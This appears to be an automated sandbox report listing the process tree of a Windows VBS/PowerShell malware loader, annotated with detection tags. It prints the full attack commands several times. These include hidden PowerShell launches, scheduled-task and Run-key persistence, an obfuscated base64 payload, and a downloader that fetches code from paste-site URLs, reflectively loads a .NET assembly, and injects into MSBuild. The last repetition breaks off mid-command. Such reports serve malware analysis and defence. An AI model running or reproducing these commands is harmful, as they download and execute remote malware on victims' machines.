        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5428
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:4756
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2196
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2316
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1708
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4084
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:5492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:6096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:3116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1540
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:3852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:1464
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:3664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:5816
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:3952
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:1708
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:468
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        
        PID:4076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        
        PID:1012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        
        PID:2384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:5176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        
        PID:1948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:6112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  PID:2276
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:2196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      PID:896
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:4468
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2236
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1548
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 